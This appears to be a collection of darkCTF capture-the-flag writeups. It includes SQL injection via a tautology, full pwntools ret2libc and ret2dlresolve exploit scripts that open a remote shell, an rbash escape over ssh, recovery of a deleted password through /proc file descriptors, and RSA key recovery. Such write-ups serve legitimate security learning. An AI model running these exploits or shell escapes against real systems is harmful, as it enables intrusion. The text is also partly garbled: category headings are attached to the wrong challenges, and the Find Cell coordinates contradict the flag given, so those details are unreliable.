
OSINT

Simple SQL

Briefing:

Try to find username and password. Website: http://simplesql.darkarmy.xyz/.

In the source we see the comment <!-- Try id as parameter -->.

Injecting a simple ?id=1 or 2=2 gives us the response Username : LOL Password : Try.

Trying ?id=2 or 2=2 gives a different response, Username : Try Password : another, so I tried a few more values until http://simplesql.darkarmy.xyz/?id=9%20or%202=2 returned the flag.
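To show why the tautology "or 2=2" works and what the fix looks like, here is an added example (not part of this writeup and not the challenge's real backend). It builds a constructed in-memory SQLite table with a placeholder flag row, runs the same query both with string concatenation and with a bound parameter, and generalises the page's single `?id=1 or 2=2` case to any injected condition:

```python
import sqlite3

# Constructed sample rows standing in for the challenge's user table; the flag
# value is a placeholder, not the real one.
ROWS = [
    (1, "LOL", "Try"),
    (2, "Try", "another"),
    (9, "flag", "darkCTF{constructed_placeholder}"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, id_param):
    # The raw `id` query-string value becomes part of the SQL text, so
    # "1 or 2=2" turns the WHERE clause into a tautology and every row matches.
    sql = "SELECT username, password FROM users WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def lookup_safe(conn, id_param):
    # Validate the type first (the parameter is meant to be an integer), then
    # bind it: the driver never parses the value as SQL.
    try:
        id_value = int(id_param)
    except ValueError:
        return []
    return conn.execute(
        "SELECT username, password FROM users WHERE id = ?", (id_value,)
    ).fetchall()


def main():
    conn = make_db()
    for param in ("1", "1 or 2=2", "9 or 2=2"):
        print(f"{param!r:14} vulnerable -> {lookup_vulnerable(conn, param)}")
        print(f"{param!r:14} safe       -> {lookup_safe(conn, param)}")


if __name__ == "__main__":
    main()
```

The vulnerable path returns every row for any injected tautology; the bound version either returns the single intended row or nothing at all, which is also the behaviour a web application firewall or query log should expect to see for an `id` parameter.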

Flag:

darkCTF{it_is_very_easy_to_find}

Web

roprop

Briefing:

This is from the back Solar Designer times where you require rope to climb and get anything you want.

nc pwn.darkarmy.xyz 5002

from pwn import *

elf = context.binary = ELF('./roprop', checksec=False)
if args.REMOTE:
    libc = ELF('./libc-remote.so')           # libc build matching the remote box
    p = remote('roprop.darkarmy.xyz', 5002)
else:
    libc = elf.libc                          # local libc for testing
    p = process()


p.recvuntil('s.\n\n')                        # end of the banner; the program reads input next

# Stage 1: 88 bytes of padding reach the saved return address; then call
# puts(GOT[puts]) to leak a libc pointer and return to main for a second input.
rop = ROP(elf)
rop.raw('A' * 88)
rop.puts(elf.got['puts'])
rop.raw(elf.sym['main'])

p.sendline(rop.chain())

# puts stops at the first NUL, so only 6 bytes of the pointer arrive; pad them back.
leak = u64(p.recv(6) + b'\x00\x00')
log.success(f'Leak: {hex(leak)}')


p.recvlines(2)                               # consume the two lines printed before the next input

# libc base = leaked puts address - offset of puts inside this libc build
libc.address = leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')

# ret2libc: execve("/bin/sh", 0, 0) built from gadgets and symbols in libc
rop = ROP(libc)
rop.raw('A' * 88)
rop.execve(next(libc.search(b'/bin/sh\x00')), 0, 0)

p.sendline(rop.chain())
p.interactive()
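The step libc.address = leak - libc.sym['puts'] above is where most ret2libc attempts go wrong, usually because the local libc does not match the remote one. The following added helper (not part of the writeup, pwntools-free, with constructed addresses and offsets rather than the challenge's real libc values) does the same 6-byte unpack and subtraction but adds the two sanity checks a practitioner wants: the result must be page aligned, and it must be a canonical user-space address.

```python
import struct

PAGE = 0x1000


def pack_leak(addr: int) -> bytes:
    """Model what puts() emits for a little-endian 8-byte pointer: it stops at
    the first NUL, so only the low 6 bytes come back."""
    return struct.pack("<Q", addr)[:6]


def libc_base_from_leak(raw_leak: bytes, puts_offset: int) -> int:
    """Recover the libc base from a 6-byte puts() leak and the offset of puts
    inside the libc build we believe the target runs."""
    if len(raw_leak) != 6:
        raise ValueError(f"expected 6 leaked bytes, got {len(raw_leak)}")
    leak = struct.unpack("<Q", raw_leak + b"\x00\x00")[0]
    if leak < puts_offset:
        raise ValueError("leak is smaller than the symbol offset; wrong symbol or truncated read")
    base = leak - puts_offset
    # libc is mmap'ed at a page-aligned address. A misaligned result usually
    # means the puts offset came from a different libc build than the target's.
    if base % PAGE:
        raise ValueError(f"libc base {base:#x} is not page aligned; libc version mismatch?")
    # x86-64 user-space pointers fit in 47 bits; anything larger is garbage.
    if base >> 47:
        raise ValueError(f"{base:#x} is not a canonical user-space address")
    return base


def main():
    # Constructed values: a made-up base and a made-up puts offset.
    fake_base = 0x7FFFF7DC0000
    puts_off = 0x80ED0
    raw = pack_leak(fake_base + puts_off)
    print(f"libc base: {libc_base_from_leak(raw, puts_off):#x}")
    try:
        libc_base_from_leak(raw, puts_off - 0x60)   # wrong build: offset differs
    except ValueError as exc:
        print("rejected:", exc)


if __name__ == "__main__":
    main()
```

The alignment check is cheap and catches the common "works locally, segfaults remotely" failure before the second stage is ever sent.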

darkctf

Rev

Find Cell

I lost my phone while I was travelling back to home but I was able to get back my eNB ID, MCC and MNC could you help me catch the tower it was last found. Note: decimal value upto 1 digit

Attachment: challenge.txt (15B)

So firstly, after seeing what they said about the eNB ID, MCC, and MNC, I looked up what they meant:

  • eNB ID : uniquely identifies an eNodeB (an LTE base station)

  • MCC : mobile country code

  • MNC : mobile network code

You can tell which value is which by knowing that the MCC and MNC are both 3 digits, so 81097 must be the eNB ID.

We can use the MCC and MNC to find out that the cell tower is in the US and that its provider is AT&T. Now we need to locate the cell tower. After a bit of googling I found a website called cellmapper.net, where you can enter the eNB ID, MNC and MCC; clicking on the resulting location gives the lat/long coordinates, which are 32.8464489 and -24.554806.

Flag:

Because the briefing says the format is darkCTF{latitude, longitude} to 1 decimal place, we know that the flag is DarkCTF{38.4, 24.5}

Note: The rounding is very odd.

Dark Social Web

Briefing:

0xDarkArmy has 1 social account and DarkArmy uses the same name everywhere. Hint: The front page of internet

First off, running python3 sherlock 0xDarkArmy gives hits on Reddit, Instagram and Twitter, among others.

While nothing interesting was found on Twitter or Instagram, there was a QR code posted on the Reddit page (seen here).

Scanning the QR code directs us to a .onion site, which can be opened in Tor.

At first glance it looks like a static template page. However, navigating to /robots.txt gives us half of the flag: darkctf{S0c1a1_D04k_

Opening developer tools and going to the Network tab, we can see that the entry for the GET request to the page has a custom HTTP response header, Flag:, listed under Date. This contains the second half of the flag: _w3b_051n7}
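Reviewing response headers for anything non-standard is the same check a defender runs when auditing an app for information leaks. As an added example (not from the writeup), the following parses a constructed raw HTTP/1.1 response that carries the page's Flag: header and reports every header not in an allowlist of common response headers; the allowlist is my assumption, not a spec.

```python
# Constructed sample response modelled on what the Network tab showed; the
# Date and Server values are made up.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Sat, 26 Sep 2020 10:00:00 GMT\r\n"
    b"Flag: _w3b_051n7}\r\n"
    b"Content-Type: text/html\r\n"
    b"Server: nginx\r\n"
    b"\r\n"
    b"<html><body>static template</body></html>"
)

# Assumed allowlist of headers one normally expects in a response; anything
# outside it deserves a look (custom X- headers included).
STANDARD_RESPONSE_HEADERS = {
    "date", "server", "content-type", "content-length", "connection",
    "cache-control", "set-cookie", "location", "etag", "last-modified",
    "vary", "transfer-encoding", "content-encoding", "expires", "pragma",
    "strict-transport-security", "content-security-policy",
    "x-frame-options", "x-content-type-options",
}


def parse_response_headers(raw: bytes):
    """Split a raw HTTP response into (status line, [(name, value), ...]).
    Header names keep their original case; duplicates are preserved."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status = lines[0].decode("latin-1")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep:
            continue  # malformed header line; skip rather than crash
        headers.append((name.decode("latin-1").strip(),
                        value.decode("latin-1").strip()))
    return status, headers


def unexpected_headers(headers, allowlist=STANDARD_RESPONSE_HEADERS):
    """Return headers whose (case-insensitive) name is not in the allowlist."""
    return [(n, v) for n, v in headers if n.lower() not in allowlist]


def main():
    status, headers = parse_response_headers(SAMPLE_RESPONSE)
    print(status)
    for name, value in unexpected_headers(headers):
        print(f"unexpected header: {name}: {value}")


if __name__ == "__main__":
    main()
```

Header matching is case-insensitive because HTTP header names are; the value is left untouched so that whatever leaked is shown verbatim.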

Flag:

darkctf{S0c1a1_D04k_w3b_051n7}


helloworld

Briefing:

taking small Bites of Bytes (File)

It looks hard to reverse, but really it just checks a function's output.

  • Put a breakpoint on both checks

  • Set the value of eax to 0 to pass them

  • Get the flag

Flag:

darkCTF{4rgum3nts_are_v3ry_1mp0rt4nt!!!}

AW


Briefing:

"Hello, hello, Can you hear me, as I scream your Flag! " (file)

Opening the file in Sonic Visualiser, you can see two audio streams. Separate the streams and then add a spectrogram layer. Play around with the colour settings to see the flag more clearly.

Flag:

darkCTF{1_l0v3_5p3ctr3_fr0m_4l4n}

Linux

Free Games


Briefing:

Wolfie getting free games from somewhere. Find the full url to that game. Note: Use the same file provided in Wolfie's Contacts Flag Format: darkCTF{http://site} (file)

Using the same file from Wolfie's Contacts, I searched for the string http:// in Autopsy.

There were a few results, but one was a .zip, so I assumed this was the game.

Flag:

darkCTF{http://aries.dccircle34.com/realitydownloadgo/c4d37739ca3dc3ed2d4852395d5ed228/784b4647446e334c58556e5473326556422e624f612e51432e4a6472/2019/07/31/PencakSilat2_1.zip}

forensics

haXXor

you either know it or not take this and get your flag 5552415c2b3525105a4657071b3e0b5f494b034515


As the name suggests, it's XOR.

We know the plaintext starts with darkCTF{, so XORing the ciphertext with this known prefix as the key outputs the actual key (see here).

Using the recovered key 1337hack then gives us the flag (see here).
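The known-plaintext step above, carried through end to end as an added example (my code, not the writeup's tooling). It takes the hex string from the briefing, XORs the first bytes against darkCTF{ to get the keystream, collapses that to its shortest repeating period in case the key is shorter than the known prefix, decrypts with the repeating key, and checks the result looks like a flag. If the key were longer than the known prefix, only its first bytes would be recovered and the plausibility check would fail, which is the signal to look for more known plaintext.

```python
# Ciphertext from the challenge briefing and the flag prefix every darkCTF flag shares.
CIPHERTEXT_HEX = "5552415c2b3525105a4657071b3e0b5f494b034515"
KNOWN_PREFIX = b"darkCTF{"


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings up to the length of the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR (the same operation encrypts and decrypts)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """ciphertext XOR known plaintext reveals the key bytes over that span."""
    return xor_bytes(ciphertext, known_plaintext)


def shortest_period(stream: bytes) -> int:
    """Smallest p such that stream repeats every p bytes (len(stream) if none)."""
    for p in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % p] for i in range(len(stream))):
            return p
    return len(stream)


def is_plausible(plaintext: bytes, prefix: bytes) -> bool:
    """Flag-shaped: starts with the prefix, printable ASCII, closes with '}'."""
    return (plaintext.startswith(prefix)
            and plaintext.endswith(b"}")
            and all(0x20 <= c < 0x7F for c in plaintext))


def solve(ct_hex: str, prefix: bytes):
    """Return (key, plaintext) for a repeating-key XOR with a known prefix."""
    ct = bytes.fromhex(ct_hex)
    stream = recover_keystream(ct, prefix)
    key = stream[:shortest_period(stream)]
    pt = xor_repeating(ct, key)
    if not is_plausible(pt, prefix):
        raise ValueError(f"key {key!r} gives implausible plaintext {pt!r}; "
                         "the key is probably longer than the known prefix")
    return key, pt


if __name__ == "__main__":
    key, pt = solve(CIPHERTEXT_HEX, KNOWN_PREFIX)
    print(f"key = {key.decode()}  flag = {pt.decode()}")
```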

Flag:

darkCTF{kud0s_h4xx0r}

Linux Starter

Briefing:

Don't Try to break this jail. ssh wolfie@linuxstarter.darkarmy.xyz -p 8001 password : wolfie

SSHing in and running echo $SHELL shows we have an rbash shell, that is, a restricted shell.

Googling how to bypass this, I found you can append 'bash --noprofile' to the ssh command.

So running ssh wolfie@linuxstarter.darkarmy.xyz -p 8001 'bash --noprofile' gives us an unrestricted shell. From there, just cd imp and cat flag.txt to get the flag.

Flag:

darkCTF{h0pe_y0u_used_intended_w4y}

newPAX

Briefing:

Even though Solar Designer gave you his times technique, you have to resolve(sort-out) yourself and go deeper. This time rope willn't let you have anything you want but you have to make a fake rope and get everything.
nc pwn.darkarmy.xyz 5001

super basic ret2dlresolve exploit

from pwn import *

elf = context.binary = ELF('./newPaX', checksec=False)

if args.REMOTE:
    p = remote('newpax.darkarmy.xyz', 5001)
else:
    p = process()
rop = ROP(elf)

# obviously a ret2dlresolve: no libc leak needed, we forge the relocation and
# symbol entries so that the dynamic linker resolves "system" for us
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw('A' * 52)                              # padding up to the saved return address
rop.read(0, dlresolve.data_addr, 100)          # read() our fake structures into writable memory
rop.ret2dlresolve(dlresolve)                   # call the PLT resolver with our forged reloc index

p.sendline(rop.chain())

p.sendline(dlresolve.payload)                # now the read is called and we pass all the relevant structures in

p.interactive()

Find Me

Briefing:

Mr.Wolf was doing some work and he accidentally deleted the important file can you help him and read the file? ssh ctf@findme.darkarmy.xyz -p 10000 password: wolfie

Running ps aux to see the running processes showed that the command tail -f /home/wolf1/pass was running as PID 10. However, in the /home/wolf1 directory this file was nowhere to be found: it had been deleted, but tail still held it open.

After googling how to view the files a background process has open, I ran cat /proc/10/fd/* and got mysecondpassword123.

Since there was a wolf2 directory I figured this was the password for wolf2, so running su wolf2 and entering this password makes us wolf2. List the files and get the flag.
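The same mechanism, shown as an added example (not part of the writeup): a Linux process keeps an unlinked file's inode alive for as long as it holds a descriptor, and /proc/PID/fd exposes it. The code opens a constructed temp file, unlinks it the way the challenge's pass file was deleted, then lists which descriptors of the process point at "(deleted)" targets and reads one back through /proc. Incident responders use the same listing to find binaries or logs an intruder unlinked while a process still has them open. It only runs on Linux; proc_available() reports whether /proc is present.

```python
import os
import tempfile


def proc_available() -> bool:
    """True when /proc/<pid>/fd exists (Linux with procfs mounted)."""
    return os.path.isdir("/proc/self/fd")


def deleted_open_files(pid="self"):
    """Return [(fd, link target)] for descriptors of `pid` whose file was
    unlinked; the kernel appends ' (deleted)' to the readlink target."""
    fd_dir = f"/proc/{pid}/fd"
    found = []
    for name in os.listdir(fd_dir):
        try:
            target = os.readlink(os.path.join(fd_dir, name))
        except OSError:
            continue  # descriptor closed between listdir and readlink
        if target.endswith(" (deleted)"):
            found.append((int(name), target))
    return found


def read_via_proc(pid, fd) -> bytes:
    """Open the still-live inode through /proc, as `cat /proc/10/fd/*` does."""
    with open(f"/proc/{pid}/fd/{fd}", "rb") as handle:
        return handle.read()


def demo():
    # Constructed stand-in for /home/wolf1/pass: write it, keep it open, delete it.
    tmp = tempfile.NamedTemporaryFile(delete=False)
    tmp.write(b"mysecondpassword123\n")   # value from the writeup, file is constructed
    tmp.flush()
    os.unlink(tmp.name)                   # directory entry gone, inode still referenced
    try:
        entries = [e for e in deleted_open_files() if e[0] == tmp.fileno()]
        content = read_via_proc(os.getpid(), tmp.fileno())
    finally:
        tmp.close()                       # last reference dropped; inode freed now
    return entries, content


if __name__ == "__main__":
    if proc_available():
        entries, content = demo()
        print("deleted-but-open:", entries)
        print("recovered:", content.decode().strip())
    else:
        print("no procfs here; run on Linux")
```

Once the last descriptor closes, the data really is gone, which is why the recovery must happen while tail is still running.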

Flag:

darkCTF{w0ahh_n1c3_w0rk!!!}

Wolfie's Contact


Briefing:

Wolfie is doing some illegal work with his friends find his contacts. (File)

  • Opening the file in Autopsy, we can see some emails. In the subject lines of some of them you can see parts of the flag.

  • Alternatively, this challenge can be done by opening the file in mousepad and using Ctrl+F to search for 'darkctf{'

Flag:

darkCTF{C0ntacts_4re_1mp0rtant}

pwn

crypto

Pipe Rhyme

Yes, we cheesed it: the modulus n is only about 270 bits, small enough that RsaCtfTool recovers the private key and decrypts the ciphertext in one go.

python3 RsaCtfTool.py -n 0x3b7c97ceb5f01f8d2095578d561cad0f22bf0e9c94eb35a9c41028247a201a6db95f -e 0x10001 --uncipher 0x1B5358AD42B79E0471A9A8C84F5F8B947BA9CB996FA37B044F81E400F883A309B886 --private

Flag:

darkCTF{4v0iD_us1ngg_p1_pr1mes}